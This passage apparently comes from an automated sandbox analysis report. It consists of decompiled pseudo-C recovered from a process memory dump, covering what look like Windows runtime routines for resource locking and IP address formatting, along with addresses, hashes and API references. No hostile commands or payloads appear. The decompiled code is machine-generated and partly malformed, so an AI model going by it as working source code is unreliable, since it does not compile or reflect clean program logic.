                                                                                                                                                        							} else {
                                                                                                                                                        								_v12 = _v12 + 1;
                                                                                                                                                        								if(_v24 > 0) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								_a7 = 1;
                                                                                                                                                        								goto L20;
                                                                                                                                                        							}
                                                                                                                                                        						} else {
                                                                                                                                                        							_v12 = _v12 + 1;
                                                                                                                                                        							L20:
                                                                                                                                                        							_t179 = _t179 + 1;
                                                                                                                                                        							_t141 =  *_t179;
                                                                                                                                                        							if(_t141 == 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							}
                                                                                                                                                        							continue;
                                                                                                                                                        						}
                                                                                                                                                        						L7:
                                                                                                                                                        						if(_t141 == 0x3a) {
                                                                                                                                                        							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t130 = _t179 + 1;
                                                                                                                                                        								if( *_t130 != _t141) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								_v20 = _v20 + 1;
                                                                                                                                                        								_t156 = 2;
                                                                                                                                                        								_v32 = 1;
                                                                                                                                                        								_v8 = _t156;
                                                                                                                                                        								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                        								goto L34;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						L8:
                                                                                                                                                        						if(_v8 > 7) {
                                                                                                                                                        							goto L41;
                                                                                                                                                        						}
                                                                                                                                                        						_t142 = _t141;
                                                                                                                                                        						if(E023806BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                        							if(E023806BA(_t124, _t142) == 0 || E02380A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t128 = 1;
                                                                                                                                                        								_a7 = 1;
                                                                                                                                                        								_v28 = _t179;
                                                                                                                                                        								_v16 = 1;
                                                                                                                                                        								_v12 = 1;
                                                                                                                                                        								L39:
                                                                                                                                                        								if(_v16 == _t128) {
                                                                                                                                                        									goto L20;
                                                                                                                                                        								}
                                                                                                                                                        								goto L28;
                                                                                                                                                        							}
                                                                                                                                                        						} else {
                                                                                                                                                        							_a7 = 0;
                                                                                                                                                        							_v28 = _t179;
                                                                                                                                                        							_v16 = 1;
                                                                                                                                                        							_v12 = 1;
                                                                                                                                                        							goto L20;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L1:
                                                                                                                                                        				_t123 = _t108 == 1;
                                                                                                                                                        				if(_t108 == 1) {
                                                                                                                                                        					goto L8;
                                                                                                                                                        				}
                                                                                                                                                        				_t128 = 1;
                                                                                                                                                        				goto L39;
                                                                                                                                                        			}
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380ba5
                                                                                                                                                        0x02380ac7
                                                                                                                                                        0x02380aca
                                                                                                                                                        0x023aeacf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeade
                                                                                                                                                        0x023aeade
                                                                                                                                                        0x023aeae3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeaf3
                                                                                                                                                        0x023aeaf6
                                                                                                                                                        0x023aeaf7
                                                                                                                                                        0x023aeafe
                                                                                                                                                        0x023aeb01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeb01
                                                                                                                                                        0x023aeacf
                                                                                                                                                        0x02380ad0
                                                                                                                                                        0x02380ad4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380ada
                                                                                                                                                        0x02380ae6
                                                                                                                                                        0x02380c34
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380c47
                                                                                                                                                        0x02380c49
                                                                                                                                                        0x02380c4a
                                                                                                                                                        0x02380c4e
                                                                                                                                                        0x02380c51
                                                                                                                                                        0x02380c54
                                                                                                                                                        0x02380c57
                                                                                                                                                        0x02380c5a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380c60
                                                                                                                                                        0x02380afb
                                                                                                                                                        0x02380afe
                                                                                                                                                        0x02380b02
                                                                                                                                                        0x02380b05
                                                                                                                                                        0x02380b08
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380b08
                                                                                                                                                        0x02380ae6
                                                                                                                                                        0x02380b44
                                                                                                                                                        0x023809f8
                                                                                                                                                        0x023809f8
                                                                                                                                                        0x023809f9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeaa0
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID: .$:$:
                                                                                                                                                        • API String ID: 3965848254-2308638275
                                                                                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction ID: 9188c110c4fc0a0b454b7751b2e0eb047c372ec380eba5a1eba69fa239c9b7d8
                                                                                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction Fuzzy Hash: FCA19B7190430AEFDF28EF64C8556BEB7B9EF05308F24846AD852AF281E734964DCB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                        			E02380554(signed int _a4, char _a8) {
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int* _t49;
                                                                                                                                                        				signed int _t51;
                                                                                                                                                        				signed int _t56;
                                                                                                                                                        				signed int _t58;
                                                                                                                                                        				signed int _t61;
                                                                                                                                                        				signed int _t63;
                                                                                                                                                        				void* _t66;
                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                        				void* _t69;
                                                                                                                                                        				signed int _t70;
                                                                                                                                                        				void* _t75;
                                                                                                                                                        				signed int _t81;
                                                                                                                                                        				signed int _t84;
                                                                                                                                                        				void* _t86;
                                                                                                                                                        				signed int _t93;
                                                                                                                                                        				signed int _t96;
                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                        				signed int _t107;
                                                                                                                                                        				void* _t110;
                                                                                                                                                        				signed int _t115;
                                                                                                                                                        				signed int* _t119;
                                                                                                                                                        				void* _t125;
                                                                                                                                                        				void* _t126;
                                                                                                                                                        				signed int _t128;
                                                                                                                                                        				signed int _t130;
                                                                                                                                                        				signed int _t138;
                                                                                                                                                        				signed int _t144;
                                                                                                                                                        				void* _t158;
                                                                                                                                                        				void* _t159;
                                                                                                                                                        				void* _t160;
                                                                                                                                                        
                                                                                                                                                        				_t96 = _a4;
                                                                                                                                                        				_t115 =  *(_t96 + 0x28);
                                                                                                                                                        				_push(_t138);
                                                                                                                                                        				if(_t115 < 0) {
                                                                                                                                                        					_t105 =  *[fs:0x18];
                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                        					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                        						goto L6;
                                                                                                                                                        					} else {
                                                                                                                                                        						__eflags = _t115 | 0xffffffff;
                                                                                                                                                        						asm("lock xadd [eax], edx");
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L6:
                                                                                                                                                        					_push(_t128);
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L7:
                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                        						if(_t115 >= 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _a8;
                                                                                                                                                        						if(_a8 == 0) {
                                                                                                                                                        							__eflags = 0;
                                                                                                                                                        							return 0;
                                                                                                                                                        						} else {
                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        							_t49 = _t96 + 0x1c;
                                                                                                                                                        							_t106 = 1;
                                                                                                                                                        							asm("lock xadd [edx], ecx");
                                                                                                                                                        							_t115 =  *(_t96 + 0x28);
                                                                                                                                                        							__eflags = _t115;
                                                                                                                                                        							if(_t115 < 0) {
                                                                                                                                                        								L23:
                                                                                                                                                        								_t130 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								while(1) {
                                                                                                                                                        									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                        									asm("sbb esi, esi");
                                                                                                                                                        									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024201c0;
                                                                                                                                                        									_push(_t144);
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_t51 = E0233F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02384FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02393F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02393F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E023C217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02393F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02383915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024201c0;
												_push(_t138);
												_push(0);
												_t58 = E0233F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02384FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02393F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02393F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E023C217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02393F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02383915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02365384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0233F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02383915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0233F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02383915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0233F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02383915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02365329(_t110, _t138);
																_t69 = E023653A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        										goto L59;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = 0;
                                                                                                                                                        									return 0;
                                                                                                                                                        								} else {
                                                                                                                                                        									_t115 =  *(_t96 + 0x28);
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_t106 =  *_t49;
                                                                                                                                                        								__eflags = _t106;
                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                        									while(1) {
                                                                                                                                                        										_t93 = _t106;
                                                                                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                                                                                        										__eflags = _t93 - _t106;
                                                                                                                                                        										if(_t93 == _t106) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										_t106 = _t93;
                                                                                                                                                        										__eflags = _t93;
                                                                                                                                                        										if(_t93 > 0) {
                                                                                                                                                        											continue;
                                                                                                                                                        										}
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = _t106;
                                                                                                                                                        								}
                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                        									continue;
                                                                                                                                                        								} else {
                                                                                                                                                        									goto L23;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L59;
                                                                                                                                                        					}
                                                                                                                                                        					_t84 = _t115;
                                                                                                                                                        					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                        					__eflags = _t84 - _t115;
                                                                                                                                                        					if(_t84 != _t115) {
                                                                                                                                                        						_t115 = _t84;
                                                                                                                                                        						goto L7;
                                                                                                                                                        					} else {
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L59:
                                                                                                                                                        			}




































                                                                                                                                                        0x023a2379
                                                                                                                                                        0x023a2379
                                                                                                                                                        0x023a237a
                                                                                                                                                        0x023a237f
                                                                                                                                                        0x023a237f
                                                                                                                                                        0x023a2385
                                                                                                                                                        0x023a2386
                                                                                                                                                        0x023a2389
                                                                                                                                                        0x023a238e
                                                                                                                                                        0x023a2390
                                                                                                                                                        0x02365378
                                                                                                                                                        0x0236537c
                                                                                                                                                        0x023a2396
                                                                                                                                                        0x023a2396
                                                                                                                                                        0x023a2397
                                                                                                                                                        0x023a239c
                                                                                                                                                        0x023a23a2
                                                                                                                                                        0x023a23a3
                                                                                                                                                        0x023a23a6
                                                                                                                                                        0x023a23ab
                                                                                                                                                        0x023a23ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a23b3
                                                                                                                                                        0x023a23b3
                                                                                                                                                        0x023a23b4
                                                                                                                                                        0x023a23b9
                                                                                                                                                        0x023a23ba
                                                                                                                                                        0x023a23ba
                                                                                                                                                        0x023a23bc
                                                                                                                                                        0x023a23bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02399153
                                                                                                                                                        0x02399158
                                                                                                                                                        0x0239915a
                                                                                                                                                        0x0239915e
                                                                                                                                                        0x02399160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02399166
                                                                                                                                                        0x02399166
                                                                                                                                                        0x02399171
                                                                                                                                                        0x02399176
                                                                                                                                                        0x02399176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02399160
                                                                                                                                                        0x023a23c6
                                                                                                                                                        0x023a23ce
                                                                                                                                                        0x023a23d7
                                                                                                                                                        0x023a23d7
                                                                                                                                                        0x023a23ad
                                                                                                                                                        0x023a2390
                                                                                                                                                        0x023a2373
                                                                                                                                                        0x023a233f
                                                                                                                                                        0x023a233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a233f
                                                                                                                                                        0x023a2291
                                                                                                                                                        0x023a2291
                                                                                                                                                        0x023a2293
                                                                                                                                                        0x023a2295
                                                                                                                                                        0x023a229a
                                                                                                                                                        0x023a22a1
                                                                                                                                                        0x023a22a3
                                                                                                                                                        0x023a22a7
                                                                                                                                                        0x023a22a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22ab
                                                                                                                                                        0x023a22ad
                                                                                                                                                        0x023a22af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22af
                                                                                                                                                        0x023a22b1
                                                                                                                                                        0x023a22b4
                                                                                                                                                        0x023a22b4
                                                                                                                                                        0x023a22b6
                                                                                                                                                        0x023653be
                                                                                                                                                        0x023653be
                                                                                                                                                        0x023653be
                                                                                                                                                        0x023653c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023653cb
                                                                                                                                                        0x023653ce
                                                                                                                                                        0x023653d0
                                                                                                                                                        0x023653d4
                                                                                                                                                        0x023653d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023653d8
                                                                                                                                                        0x023653e3
                                                                                                                                                        0x023653ea
                                                                                                                                                        0x023653ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023653d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a228f
                                                                                                                                                        0x023a2349
                                                                                                                                                        0x023a234d
                                                                                                                                                        0x023a2251
                                                                                                                                                        0x023a2251
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a2251
                                                                                                                                                        0x023a21a4
                                                                                                                                                        0x023a21a4
                                                                                                                                                        0x023a21a6
                                                                                                                                                        0x023a21a8
                                                                                                                                                        0x023a21ac
                                                                                                                                                        0x023a21b6
                                                                                                                                                        0x023a21b8
                                                                                                                                                        0x023a21bc
                                                                                                                                                        0x023a21be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a21c0
                                                                                                                                                        0x023a21c2
                                                                                                                                                        0x023a21c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a21c4
                                                                                                                                                        0x023a21c6
                                                                                                                                                        0x023a21c6
                                                                                                                                                        0x023a21c8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a21c8
                                                                                                                                                        0x023a21a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a2183
                                                                                                                                                        0x0238057b
                                                                                                                                                        0x0238057d
                                                                                                                                                        0x02380581
                                                                                                                                                        0x02380583
                                                                                                                                                        0x023a2178
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380589
                                                                                                                                                        0x0238058f
                                                                                                                                                        0x0238058f
                                                                                                                                                        0x02380583
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023A2206
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-4236105082
                                                                                                                                                        • Opcode ID: b54ce2494444ca91803186c811649c1682bb8f2cabc697d1dbd2c9c37621d35c
                                                                                                                                                        • Instruction ID: 21fce6e99022c3944f155d83388db0d86e61ae713d70bd995eace2f41cd3ee1f
                                                                                                                                                        • Opcode Fuzzy Hash: b54ce2494444ca91803186c811649c1682bb8f2cabc697d1dbd2c9c37621d35c
                                                                                                                                                        • Instruction Fuzzy Hash: 1D5129717003116BEB299A18CC91F6773EAEF95710F218279FD55DF285DA31EC428B90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E023814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				char _v10;
                                                                                                                                                        				char _v140;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t24;
                                                                                                                                                        				void* _t26;
                                                                                                                                                        				signed int _t29;
                                                                                                                                                        				signed int _t34;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                        				void* _t51;
                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                        				void* _t54;
                                                                                                                                                        				signed int _t57;
                                                                                                                                                        				void* _t58;
                                                                                                                                                        
                                                                                                                                                        				_t51 = __edx;
                                                                                                                                                        				_t24 =  *0x2422088; // 0x7777b0d6
                                                                                                                                                        				_v8 = _t24 ^ _t57;
                                                                                                                                                        				_t45 = _a16;
                                                                                                                                                        				_t53 = _a4;
                                                                                                                                                        				_t52 = _a20;
                                                                                                                                                        				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                        					L10:
                                                                                                                                                        					_t26 = 0xc000000d;
                                                                                                                                                        				} else {
                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                        						if( *_t52 == _t45) {
                                                                                                                                                        							goto L3;
                                                                                                                                                        						} else {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        					} else {
                                                                                                                                                        						L3:
                                                                                                                                                        						_t28 =  &_v140;
                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                        							_push("[");
                                                                                                                                                        							_push(0x41);
                                                                                                                                                        							_push( &_v140);
                                                                                                                                                        							_t29 = E02377707();
                                                                                                                                                        							_t58 = _t58 + 0xc;
                                                                                                                                                        							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                        						}
                                                                                                                                                        						_t54 = E023813CB(_t53, _t28);
                                                                                                                                                        						if(_a8 != 0) {
                                                                                                                                                        							_t34 = E02377707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                        							_t58 = _t58 + 0x10;
                                                                                                                                                        							_t54 = _t54 + _t34 * 2;
                                                                                                                                                        						}
                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                        							_t40 = E02377707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                        							_t58 = _t58 + 0x10;
                                                                                                                                                        							_t54 = _t54 + _t40 * 2;
                                                                                                                                                        						}
                                                                                                                                                        						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                        						 *_t52 = _t53;
                                                                                                                                                        						if( *_t52 < _t53) {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						} else {
                                                                                                                                                        							E02342340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                        							_t26 = 0;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				return E0234E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                        			}





















                                                                                                                                                        APIs
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 023AEA22
                                                                                                                                                          • Part of subcall function 023813CB: ___swprintf_l.LIBCMT ref: 0238146B
                                                                                                                                                          • Part of subcall function 023813CB: ___swprintf_l.LIBCMT ref: 02381490
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0238156D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                        • Opcode ID: 72411da80ffb43d8b13a7356b4c59b21f9843f3b1e8695b0bb8c1d600a3c5446
                                                                                                                                                        • Instruction ID: 444ab5abf151cf9426fbf91097ed4daa0a7fd3945a6337aca087b7ae0896b99f
                                                                                                                                                        • Opcode Fuzzy Hash: 72411da80ffb43d8b13a7356b4c59b21f9843f3b1e8695b0bb8c1d600a3c5446
                                                                                                                                                        • Instruction Fuzzy Hash: 692181729003199BDB20EE54CC40AEBB3EDAB10704F444566ED8AD7140DB74EA59CBE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                                        			E023653A5(signed int _a4, char _a8) {
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t32;
                                                                                                                                                        				signed int _t37;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				signed int _t42;
                                                                                                                                                        				void* _t45;
                                                                                                                                                        				intOrPtr _t46;
